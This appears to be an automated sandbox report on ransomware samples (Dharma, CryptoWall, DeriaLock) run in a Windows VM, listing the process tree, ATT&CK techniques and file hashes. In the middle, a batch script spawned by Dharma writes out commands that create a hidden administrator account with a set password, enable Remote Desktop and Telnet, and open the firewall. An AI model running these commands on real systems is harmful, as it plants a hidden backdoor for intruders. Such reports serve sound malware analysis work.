C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:22⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:82⤵PID:4724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:82⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5376 /prefetch:82⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:12⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6076 /prefetch:82⤵PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:12⤵PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3212 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:12⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:12⤵PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:4460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:12⤵PID:4344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:4224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 /prefetch:82⤵PID:1204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6224 /prefetch:22⤵PID:4872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵PID:3176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5636 /prefetch:82⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:4068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4780 /prefetch:82⤵PID:832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:82⤵PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 /prefetch:82⤵PID:2948
-
-
C:\Users\Admin\Downloads\Dharma.exe"C:\Users\Admin\Downloads\Dharma.exe"2⤵
- Executes dropped EXE
PID:4260
-
-
C:\Users\Admin\Downloads\Dharma.exe"C:\Users\Admin\Downloads\Dharma.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5032 -
C:\Users\Admin\Downloads\ac\nc123.exe"C:\Users\Admin\Downloads\ac\nc123.exe"3⤵
- Executes dropped EXE
PID:2268 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:1476
-
-
-
C:\Users\Admin\Downloads\ac\mssql.exe"C:\Users\Admin\Downloads\ac\mssql.exe"3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2252
-
-
C:\Users\Admin\Downloads\ac\mssql2.exe"C:\Users\Admin\Downloads\ac\mssql2.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "3⤵PID:2704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "3⤵PID:3744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="4⤵PID:3856
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\SysWOW64\find.exeFind "="5⤵PID:3256
-
-
-
C:\Windows\SysWOW64\net.exenet user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵PID:4568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"5⤵PID:4572
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators systembackup /add4⤵PID:412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators systembackup /add5⤵PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="4⤵PID:216
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value5⤵PID:1220
-
-
C:\Windows\SysWOW64\find.exeFind "="5⤵PID:5016
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" systembackup /add4⤵PID:3024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add5⤵PID:1676
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited4⤵PID:3972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited5⤵PID:992
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f4⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f4⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f4⤵PID:672
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\systembackup +r +a +s +h4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1040
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 "Remote Desktop"4⤵
- Modifies Windows Firewall
PID:4864
-
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start=auto4⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\SysWOW64\net.exenet start Telnet4⤵PID:2484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Telnet5⤵PID:3952
-
-
-
-
C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:4452
-
-
-
C:\Users\Admin\Downloads\Dharma.exe"C:\Users\Admin\Downloads\Dharma.exe"2⤵
- Executes dropped EXE
PID:4824
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4880
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3340
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4340
-
C:\Users\Admin\Downloads\CryptoWall.exe"C:\Users\Admin\Downloads\CryptoWall.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:2820 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\syswow64\explorer.exe"2⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
PID:5052 -
C:\Windows\SysWOW64\svchost.exe-k netsvcs3⤵PID:2488
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4892
-
C:\Users\Admin\Downloads\CryptoWall.exe"C:\Users\Admin\Downloads\CryptoWall.exe"1⤵
- Executes dropped EXE
PID:400
-
C:\Users\Admin\Downloads\CryptoWall.exe"C:\Users\Admin\Downloads\CryptoWall.exe"1⤵
- Executes dropped EXE
PID:4492
-
C:\Users\Admin\Downloads\CryptoWall.exe"C:\Users\Admin\Downloads\CryptoWall.exe"1⤵
- Executes dropped EXE
PID:1752
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2780
-
C:\Users\Admin\Downloads\DeriaLock.exe"C:\Users\Admin\Downloads\DeriaLock.exe"1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:900
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:2944
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3644
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵PID:4324
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
- Modifies registry class
PID:5052
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5a8e767fd33edd97d306efb6905f93252
SHA1a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA51207b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241
-
Filesize
152B
MD5439b5e04ca18c7fb02cf406e6eb24167
SHA1e0c5bb6216903934726e3570b7d63295b9d28987
SHA256247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD50182dd995e358765a03dff9922861cfc
SHA1acc21e02895e35533528e29ee7fd76f55361608c
SHA256a0343b741f6adb374f78282ad9861c53c32eaf206d70baf6057b1d1a196d170b
SHA5122f2d57197f0f697d01f0e44c84627c727f307af9c96bba4a1b3577b3e5b55a32fe31c598829c13135fbd8afc1b2c5a0b7988f26681b5ffa25de7ba725602876d
-
Filesize
579B
MD5c6dba56b9c097935596daed379ede4ae
SHA1f8603b0cfcabf7ac5e9de6497d38e5ea417d3a4f
SHA2567d2e72a397c882f5e00eee536904c318247246dda54fa3b46962020e3560bba6
SHA5128091f48e4b161d1976d6ef19acb85d9cfd360c484dc84cb1f8ad150ddb740bfea76dd58c7763a05f7d4900e27007709bba20c1e2c61f6eed4a9e444580ca0e82
-
Filesize
6KB
MD5ff2bb5701b897eae4158a24ef1022989
SHA1b009002a963662538823b89f3f58db269b4fc837
SHA256180d9514dcba7cc9c477188f7a00c41d73994c2e68ec0a14dd044f0dbfd03b5c
SHA5129f5ad0793565f5b9749d7f74654133182656ac44c4a19c45fbec3011aae295dfab74eb62970ce825e3012bfb5d6aae5e22706438e599063eab95ac8fcb73aa43
-
Filesize
6KB
MD57990c2f8e6fa8391d29744cef7c8afd9
SHA186321a391b4efd73e1c15ac35a0257b00c9d4cfa
SHA25616db526289a8c1ea72d75ad7c80375de96e6da69355e366ffde510f2bfb467fb
SHA512253152388211db82665eb02f906bb2635e05ad84057c637c04aba8320f688c1ca151107bf258c5a8589f18af98bb2badd44bbf4546f873f956b3f4580a75f55a
-
Filesize
6KB
MD5f339a18735c56f5cc64246076c111c83
SHA1516f1a315b9f3508d1539ac34313591f96e82836
SHA256af720e4c8200518feba5ecd08f95caafa31a24745a66300e0d274e7124ac1a21
SHA512aec7ae35cb99a046b4cd2d2b7fff0214b2bb41e2e389280b068c64a3b9e4903b929b2b189084f6c42cddceb11918b7481652ed3a9d764bc1ac5588bb6ac49dcf
-
Filesize
6KB
MD5a24bbbb64652d62767b53770b26ccf9f
SHA1f70b4c634afbf1f34252af2df6ada41f3eade353
SHA2563ca6eb173a05714ebb98e013a924c95a5f34247fc7a307f121537804dc46ce22
SHA512f748de0e1576ebdce6fc4c06150ac26f2f18acdb6345247f11b6aeb61153c488cf3b5e3b321c2f9698ad1714f8c8c6848173f839e4ed4cbfb2ed5b26cbda344a
-
Filesize
1KB
MD5d4284654b3f922fd766ff7bebc4b8069
SHA131f08f295c72a98040948553a7ce7a00aefcf202
SHA256c1703cd9b7b1f9604f0c2ed137821526bd8fc3812becb38ce61066533883ab5b
SHA512623655fad7b53ee188342d48f42a5b6a6479f3f5e363b93619f750f0c995662ff6fcf35e039fbc5335bd821dae7aec0352d72b2e72a436c4fc199e54cc10331e
-
Filesize
1KB
MD5ddc4dd984e19bef4c10777286b351dcd
SHA1f7e406efa8549628cd38cf7218d92095e09fa05c
SHA256fc6de52bded86579d9a10069211e5d4ed27c9265f54eaae5f34003ee8bcc7394
SHA512e189d2af2dac92748216ac92517897751b2f7ff12e6fd34e81c846caec87f9b6880de10fa5d68c5097e629abfeeef0bc466ebb84e6fd12ae6aa345999e95400a
-
Filesize
1KB
MD585f895f3ad6e6d7765fbe1daa950329e
SHA1769afdf4fb60d9fdfb7d10efdc16e06b65a7610e
SHA256022dec517de79a6c832377552e32a226e3d9cc5d65d9d207f1e2774424912889
SHA512a341876fd16152a1343c8c3e4c42beda2c95090ebfa70ae18f552e4bed01df8bc0ce0970642124205ee632fb14e49ca182c88b90deb23169dabe83ba9bd763e4
-
Filesize
1KB
MD5ef8f38a6f4abf541049bd888ad2b55eb
SHA104ba21293f091815bcaae4988e4de9a4a5b1043c
SHA2563c3b895634be23e89a76af11880c5eb1095fae5b83b56ddfa9bd41e9aa7d9ccd
SHA5120a30e4410a54b2f5164398e838f91594022b950ecc5e12097440567c88199a30262b1bf0caa309a4cf35d910a76d94d220e9a5c5ba2cb735126dde75596d432c
-
Filesize
1KB
MD5f24237e206313489d7b5569384ccde32
SHA1af9ca74a3b4dcc733b2461e26214465beb57d496
SHA256421800e2526a23a527d11e0b300142e30fcbdf9dbfc12708d677c71079d95dae
SHA51240fef6449a09c401aaf9e402fa07ae831b83370c4b9f8658f89f9023fae67edc40e347672f8ce513659c3cdd6d189f5275fedf36e86bf79a3bba4963d62e09e0
-
Filesize
1KB
MD55183fd2ed89a0feb755a90ece29f1d11
SHA198a0b5bc9324f414e962d1e33c3892bec28b60f7
SHA25640dbfc1673257682d807b1e057f6b8d953f921b44a51e6187d1eef2e6d34b732
SHA512fc008fefc7456e98a71e411319dc00e2cf68c2a2ae8fce0ba5a8e70396452be8a000bb1947565295e0cf71b06e60b8d4faac3513df69bb0fff9421cf394508cb
-
Filesize
874B
MD5341b959c4aa9b828aba687562c30e358
SHA12bb143d20ab060ac54eb63a9af15ff2920b44f5f
SHA25636a2b238329181ed3ee3abaa9f8cee769230d4c5bdf973f463b9de01c5136ac1
SHA5127a42b34b21dc3c552592f5d40688bed577e2bd23e63c7883de648310eee0b807eda546a084ea31fdb0ffdc2dbd5a0233295f366839c994eb3a6f005aab7c5fbb
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
12KB
MD5f1f13c99edd62993c3274666a6637d81
SHA1a63a7811f005afe26997526a1a9cc9543d5089d2
SHA256db69c84a2c276469f5a6041e833a459b1c472d1debfec50a5a0a5b2c2ab3ad9e
SHA512de3f91dc0830e24d3e5c36857293e589b1cfea9514d60c312938de31966b02ed8f25c06a3ee92aa15de9b730e541c2216dfb4deddde1c680eb610120059958c1
-
Filesize
11KB
MD5d3e33affb0dd53be9fef286f84422b76
SHA17a1177edcc62512d4713c11b01d04da1d4dcc067
SHA256633802d7a761176066610e196f4b5dd48847f738a7f2ae19e24454e7948e5d8b
SHA512c298a9e9e1b0ad1d917a183219969b17b175ea357e022c7b27114da4074f1e3254e8bc4eb9963f224fa7ec56ca7301b4372fcc6495d9741a5278aca39fb63318
-
Filesize
11KB
MD50a87c73acd4a1c09200e667786b0923e
SHA1095f880cf55b6e2aafea91ed15afd68e9c683fff
SHA256af00b7cf7569f18e064d7ccb215fcb3da73c997f7f91496642bb268c7b3bfc37
SHA51242d4552e6ed69e27b8363f788c60843ff5ac595ff098cc430f89d3a4000d414bbc32df8082b0a324b72bb29629edf03c4f31886d0274b9e25a207f650bf8e2db
-
Filesize
12KB
MD527cb7e39461c3093ab5c42900f7de1aa
SHA12f880f5f0b50461569370a21311ade6fcfb3d9b1
SHA256deee610d4cf7ddf585bbf79a5cc39f23481d66b32c56e06691e0834c623d1ab5
SHA5127214b092cb3b6db70ad2913d2081d19c984bacc619f891fa28309dcd7e7eb48272820f415379fd9a0e4be4a49b4d1cad55afd2bd432188dd792f1ec719c842fc
-
Filesize
11KB
MD553c0999ff8a2bc10060116c72e64edb8
SHA161e59113f610e9f618e3dddd2df520965f5b101d
SHA256d025d16de9dc3f2fc95464cf495030857b5fb12b275683e28149ce69e205f009
SHA512130d884c5afa213427882328ebebcea8c31aac185b6ceadf04536fa4f6e7d1a096f401b4d597c676c0341e4698b83b0562bc5e4a95b71b8b7f38a501360b3c37
-
Filesize
12KB
MD5594214d6d9a3ad57c02210c0898b83ae
SHA1ad7b4cab479536ed336b607c31e1c574c4d21e0e
SHA256b4d7732f7c5ebf9487bcffea0ac2d2321161cda7dc7f5a023da34cd290bc49fb
SHA512bc9f6c9c24d1192c888975d3f24fe7c0b2bc8edd8867d7acc623eb32a3f770bfa4b20e6e544c791832735a740fbbf6e1ff4da2673b7ac1cb88daf1a58ea00732
-
Filesize
261KB
MD57d80230df68ccba871815d68f016c282
SHA1e10874c6108a26ceedfc84f50881824462b5b6b6
SHA256f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b
SHA51264d02b3e7ed82a64aaac1f74c34d6b6e6feaac665ca9c08911b93eddcec66595687024ec576e74ea09a1193ace3923969c75de8733859835fef45335cf265540
-
Filesize
484KB
MD50a7b70efba0aa93d4bc0857b87ac2fcb
SHA101a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA2564f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
